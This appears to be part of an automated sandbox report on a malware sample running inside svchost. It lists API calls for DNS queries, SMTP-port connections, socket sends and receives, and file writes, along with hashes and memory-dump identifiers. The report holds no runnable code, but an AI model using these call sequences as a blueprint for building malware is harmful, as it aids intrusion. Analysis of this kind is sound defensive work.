                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocGdip
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1856340535-0
                                                                                                                                                                                                                                                          • Opcode ID: aebcb12a3578fe10b01d8265182e782cd0a2cf7a18f50d2cb95028721df1330d
                                                                                                                                                                                                                                                          • Instruction ID: 162bc25bd3c12c6731c916bea97d04466642709afc5277724cef78296615d18d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aebcb12a3578fe10b01d8265182e782cd0a2cf7a18f50d2cb95028721df1330d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1541247AE40305ABCF069FBCC8845AEB7B5EF48241F39403DE541A7340DF35AA658BA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 1314D065
                                                                                                                                                                                                                                                            • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 1314D09E
                                                                                                                                                                                                                                                          • DnsQuery_A.DNSAPI(?,0000000C,00000028,00000000,?,00000000), ref: 1314D0B1
                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(?,-00000004,000000BD,0000000C,00000028,00000000,?,00000000), ref: 1314D0D6
                                                                                                                                                                                                                                                          • DnsRecordListFree.DNSAPI(?,?), ref: 1314D13E
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(0000000C,00000028,00000000,?,00000000), ref: 1314D16B
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: wnsprintf$ErrorFreeLastListQuery_Recordlstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3873175859-0
                                                                                                                                                                                                                                                          • Opcode ID: b9a01a87296449b41382b83979c05cedc972fd9e8370d67458ba98add1af47bf
                                                                                                                                                                                                                                                          • Instruction ID: f6f7a0baabf7a0b2a30316a458c1fa14539f85eb32859fab4e0cd8c58dc0cc47
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9a01a87296449b41382b83979c05cedc972fd9e8370d67458ba98add1af47bf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F4118B16402596FEB26ABA8CC91BE63BDCEB15304FA80026FD60D2193D368D544DB31
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(-00000004,000000F5,00000000,00000000,00000004,00000001), ref: 13146E18
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000004), ref: 13146E37
                                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 13146E4D
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 13146E5E
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 13146E88
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 13146EAD
                                                                                                                                                                                                                                                            • Part of subcall function 13142F79: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FDC
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryTimewnsprintf$AddressFileFreeLoadProcSystemlstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2555659749-0
                                                                                                                                                                                                                                                          • Opcode ID: e0bff822e13d61dd72824745379a1d524290620c2234ef465190ce2767934253
                                                                                                                                                                                                                                                          • Instruction ID: dabd049f6be1e818442d4598eb3b7bb778e403c5688bf6bd21f820f2eb6281ed
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0bff822e13d61dd72824745379a1d524290620c2234ef465190ce2767934253
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43215872D00229FBDF01EFA4CC859EE7B7CEF09B28F248465F905A2144E7719A51DBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • OpenFile.KERNEL32(00000000,?,00000042), ref: 13144B7A
                                                                                                                                                                                                                                                          • OpenFile.KERNEL32(00000000,?,00001042), ref: 13144B92
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 13144B96
                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 13144BA2
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,1314DF11,1314E1E5,00000000), ref: 13144BB4
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 13144BBB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$Open$CloseErrorHandleLastPointerWrite
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1166246964-0
                                                                                                                                                                                                                                                          • Opcode ID: 51cdfe6b6749e1e5a26ed3c2d898b94d31f371a768f9a6befa70090ac7cf3a87
                                                                                                                                                                                                                                                          • Instruction ID: 15d8d02e8b926ec5a79a478293255d2b80f32c80bb54f5d0f4a4ab43e7174df0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51cdfe6b6749e1e5a26ed3c2d898b94d31f371a768f9a6befa70090ac7cf3a87
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97F04F32601168BBDB246B66DC88DEF3FBDEB89664F008125FA09D3084DB748945DFB0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(inetcomm.dll,00000000,00000000,00000067,?,?,?,?,?,?,?,?,?,1314DA6C,00000000), ref: 13146CE5
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(inetcomm.dll,?,?,?,?,?,?,?,?,?,1314DA6C,00000000), ref: 13146CF0
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                                                                          • String ID: MimeOleGenerateMID$inetcomm.dll
                                                                                                                                                                                                                                                          • API String ID: 4133054770-2511522974
                                                                                                                                                                                                                                                          • Opcode ID: a4cf49e35a7a388d05d28bf54292f99f3453a17003bf44509ed285f636672002
                                                                                                                                                                                                                                                          • Instruction ID: 89981d3dc23ffecf24b0d677873d8da3042bc58058477250c88c3045d2683477
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4cf49e35a7a388d05d28bf54292f99f3453a17003bf44509ed285f636672002
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25F0E571344312EBC3015B79AC48B8FB66CDFD59BEF254838F040F1104E72484415272
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a9c0f0ee489942955c4d027aee019131bbe61b98e97264bedac0433adbc81ef9
                                                                                                                                                                                                                                                          • Instruction ID: 1bbd2eee5b8113a3cdaab39bed80c58b06cccd8305aefa2e4b8140a6d9484044
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9c0f0ee489942955c4d027aee019131bbe61b98e97264bedac0433adbc81ef9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CB190B5A00306EFDB14CFA8CC91E6ABBB9FF58304F204569E956EB691D730E911CB50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrcmpA.KERNEL32(1314DA4B,-00000004,00000042,-00000004,0000007A,00000000,1314E1E1,00000000,1314E1E5), ref: 1314D366
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcmp
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1534048567-0
                                                                                                                                                                                                                                                          • Opcode ID: 4a61bf6aa6ca18f9759d97f1bb058023532ad13992efc2a450b306a7af534a25
                                                                                                                                                                                                                                                          • Instruction ID: b0c3233bf479d5e0ebebb69b3d0348cd5b8a8a69b5386fb8f37b81496b7ae10e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a61bf6aa6ca18f9759d97f1bb058023532ad13992efc2a450b306a7af534a25
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E61CFB5A00319ABDF119BA8CC81DAE7779EF81758F680425F505E7641EB38E981CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 131463A5
                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 131463BF
                                                                                                                                                                                                                                                          • sendto.WS2_32(?,00000374,00000000,13161584,00000010), ref: 131463E7
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 131463F1
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 13146403
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Read$ExitProcessSleepsendto
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1614787347-0
                                                                                                                                                                                                                                                          • Opcode ID: d2f4072409005e6626f78853b55f4e55af6a4931fd5888f89c96aeb35619061e
                                                                                                                                                                                                                                                          • Instruction ID: 0fed5bbe40d5aac35426d1477084d13cd0d3141a98e6475887066ccef82ed279
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2f4072409005e6626f78853b55f4e55af6a4931fd5888f89c96aeb35619061e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF21F5F2900358AFDB21EFE48DC0E9A732CAB05758F150974F61A67185E370BE48CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsBadReadPtr.KERNEL32(00000008,00000001,00000018,00000000,131511EA,00000008,?,1314DF65,76132640,1314E300,?,00000000,00000000,-00000004,00000049,00000000), ref: 1314EADE
                                                                                                                                                                                                                                                          • WSASetLastError.WS2_32(00000000,?,1314DF65,76132640,1314E300,?,00000000,00000000,-00000004,00000049,00000000), ref: 1314EAEF
                                                                                                                                                                                                                                                          • shutdown.WS2_32(00000000,00000002), ref: 1314EAFA
                                                                                                                                                                                                                                                          • WSAGetLastError.WS2_32(00000000,00000002,00000000,?,1314DF65,76132640,1314E300,?,00000000,00000000,-00000004,00000049,00000000), ref: 1314EAFF
                                                                                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 1314EB08
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$Readclosesocketshutdown
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4241232737-0
                                                                                                                                                                                                                                                          • Opcode ID: f5a5c8a6ac9c3e15fbcef34550ace5cb23a08cb4c357549ba5e262152b593422
                                                                                                                                                                                                                                                          • Instruction ID: 5c2a29b6aafa48c1bec0fafc417d801875d82609c2feba32a33d38c33df996b6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5a5c8a6ac9c3e15fbcef34550ace5cb23a08cb4c357549ba5e262152b593422
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BF04F35600240ABDB225F5EDC88D4A77A9EFC2B00B280538F4C5AB214EB216880CB71
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • send.WS2_32(1314E197,?,00000000,13143415), ref: 1314DB4E
                                                                                                                                                                                                                                                          • recv.WS2_32(00000008,?,00000000,00020000), ref: 1314DB9D
                                                                                                                                                                                                                                                          • recv.WS2_32(?,?,00000000,?), ref: 1314DBF7
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: recv$send
                                                                                                                                                                                                                                                          • String ID: UyB
                                                                                                                                                                                                                                                          • API String ID: 1963230611-4078557002
                                                                                                                                                                                                                                                          • Opcode ID: aedb760a50ced2a31eae24f47bad5823364800f75ea34ae41e42e9c1d7071104
                                                                                                                                                                                                                                                          • Instruction ID: e4c958253a69d92eae123b0edb02fe629c32064ad37c2ed88fdb799cf2c93c10
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aedb760a50ced2a31eae24f47bad5823364800f75ea34ae41e42e9c1d7071104
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0641E376600215ABDF1ADBA9CC85EAE7779FF42220F64443CF02293190EF717A40CB40
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00007530,76132640,00000000,00000000), ref: 1314D8A6
                                                                                                                                                                                                                                                            • Part of subcall function 13144EA1: EnterCriticalSection.KERNEL32(00000000,1314E2F0,?,00000000,00000000,-00000004), ref: 13144EAC
                                                                                                                                                                                                                                                            • Part of subcall function 13144C1F: IsBadReadPtr.KERNEL32(00000000,00000004,00000000,00000000,131505E9,?,00000000,00000000), ref: 13144C32
                                                                                                                                                                                                                                                            • Part of subcall function 13144C1F: IsBadReadPtr.KERNEL32(00000000,00000001), ref: 13144C46
                                                                                                                                                                                                                                                            • Part of subcall function 13144C1F: HeapFree.KERNEL32(00000000,00000000), ref: 13144C5B
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(1314E1F2,?,?,?,?,?,00000000), ref: 1314D635
                                                                                                                                                                                                                                                          • inet_ntoa.WS2_32(00000000), ref: 1314D720
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 1314D746
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Read$CriticalEnterFreeHeapSectionSleepinet_ntoalstrlenwsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3707610853-0
                                                                                                                                                                                                                                                          • Opcode ID: 51663f21bcf7e422acca725b706df896575aabc9a0bc1173ddc667c30757e91b
                                                                                                                                                                                                                                                          • Instruction ID: c0d9678a5d6312c914dfe4a6ca5129e439d50c2ac836d23cb03dc97d3158bba4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51663f21bcf7e422acca725b706df896575aabc9a0bc1173ddc667c30757e91b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DA1E8B5A00265AFDB08EF68C9D0C6577F9FB4524C7688438E906D7316EB34E985CF60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CharLowerA.USER32(00000000,131616E8,?,00000000), ref: 1314E8A5
                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(00000000,?,-00000004,00000060,?,00000000,-00000004,0000005F,?,00000000,-00000004,0000005E,?,00000000,-00000004,0000005D), ref: 1314E9C5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CharLower
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1615517891-0
                                                                                                                                                                                                                                                          • Opcode ID: e15f2f67250bf7c819582e290c9eaea27e66e80e3beb9cdf804c5e2b29c6ed88
                                                                                                                                                                                                                                                          • Instruction ID: 419d3c6777e993e7358b4fad858bdbe2f704fa2787bc25a9698b8ab6963bd5de
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e15f2f67250bf7c819582e290c9eaea27e66e80e3beb9cdf804c5e2b29c6ed88
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50518176A04605EFDB21CF98C981E9AB7B9FF08314F284029E65AD7290D731E950CB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 1314AF0D
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,00000000), ref: 1314AFCC
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,-00000004,00000082), ref: 1314AFEE
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000), ref: 1314AFF2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrcpylstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2274183309-0
                                                                                                                                                                                                                                                          • Opcode ID: af2b05a22181a1154fb521f424507219b8dd8e098b67af918b9410bab3b45479
                                                                                                                                                                                                                                                          • Instruction ID: 984daec6d2f47008fb8d3025faa8029e27d34ef63afc459df32f1da8c8b08b8e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af2b05a22181a1154fb521f424507219b8dd8e098b67af918b9410bab3b45479
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 253130B6A00319AFDB00DFA9CD909AEB7FDFF48644B56447AE545E7210E730EA418B60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,00000000,761311A0), ref: 13151248
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 13151267
                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,-00000004,0000004C,570000AF), ref: 131512A4
                                                                                                                                                                                                                                                          • setsockopt.WS2_32(?,0000FFFF,00001006,?,00000008), ref: 13151323
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Entersetsockopt
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2622634160-0
                                                                                                                                                                                                                                                          • Opcode ID: a6407b1cd4d2954f65e7e183993cd6715576cc1c471be36c2dc44acfaac3818c
                                                                                                                                                                                                                                                          • Instruction ID: 23073220f776133a972de4463eb0e075911ea0260f81aa9f22f346945dc2a4f5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6407b1cd4d2954f65e7e183993cd6715576cc1c471be36c2dc44acfaac3818c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 793118B5A047419FC720DF5AC98194AFBF4FB09324B908A3EE5AAD7A90C770A545CF10
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • htons.WS2_32(00000019), ref: 1314BD1F
                                                                                                                                                                                                                                                          • setsockopt.WS2_32(1314CF4F,0000FFFF,00001005,?,00000004), ref: 1314BD68
                                                                                                                                                                                                                                                          • setsockopt.WS2_32(1314CF4F,0000FFFF,00001006,?,00000004), ref: 1314BD7B
                                                                                                                                                                                                                                                          • connect.WS2_32(1314CF4F,00000002,00000010), ref: 1314BD88
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: setsockopt$connecthtons
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3400676187-0
                                                                                                                                                                                                                                                          • Opcode ID: edb9acae06f361222555068b2b358c9c1b74db9419235bff203ff353452a2ee5
                                                                                                                                                                                                                                                          • Instruction ID: e84e74bdb04a0a8647a6cae6d0c50be21cee2977d7f6e1224aa6945bccac1f85
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edb9acae06f361222555068b2b358c9c1b74db9419235bff203ff353452a2ee5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05016979A40349BBEB11DBA8CC06EEFB779AF85700F100439FA45AB1D0D7B0AA049B51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 13152BED: __amsg_exit.LIBCMT ref: 13152BFB
                                                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 1315432B
                                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 1315433B
                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 13154358
                                                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(1315AD08), ref: 13154383
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000008.00000002.2788914206.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_8_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4129207761-0
                                                                                                                                                                                                                                                          • Opcode ID: fbd2b2b42058274c9e1e40ad0aec4839c2dda945ff8203164f757b40e5767281
                                                                                                                                                                                                                                                          • Instruction ID: 20be28432fdb317510c556bdc8dbfa4516dcce9ab8cffca2a6a1a2e38269f76f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbd2b2b42058274c9e1e40ad0aec4839c2dda945ff8203164f757b40e5767281
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA018E36B41731DBDB85AF69958478D7260BF03611F484115F470B7650DB386942CBE1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000001,00000000,13152EF7,13152D98,00000001,1315294F,?,00000000,00000000,?,?,?,13152A61,?,13152F12,?), ref: 13152B78
                                                                                                                                                                                                                                                            • Part of subcall function 13152A85: TlsGetValue.KERNEL32(00000000,13152B8B,?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476), ref: 13152A8C
                                                                                                                                                                                                                                                            • Part of subcall function 13152A85: TlsSetValue.KERNEL32(00000000,?,?,13152A61,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152AAD
                                                                                                                                                                                                                                                          • __calloc_crt.LIBCMT ref: 13152B9A
                                                                                                                                                                                                                                                            • Part of subcall function 13152F45: __calloc_impl.LIBCMT ref: 13152F53
                                                                                                                                                                                                                                                            • Part of subcall function 13152F45: Sleep.KERNEL32(00000000), ref: 13152F6A
                                                                                                                                                                                                                                                            • Part of subcall function 13152A17: TlsGetValue.KERNEL32(00000000,13153CD0,1315290D,?,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152A24
                                                                                                                                                                                                                                                            • Part of subcall function 13152A17: TlsGetValue.KERNEL32(FFFFFFFF,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?,?,?,131520C2,0000000E), ref: 13152A3B
                                                                                                                                                                                                                                                            • Part of subcall function 13152AB7: GetModuleHandleA.KERNEL32(KERNEL32.DLL,131569C8,0000000C,13152BC8,00000000,00000000,?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7), ref: 13152AC8
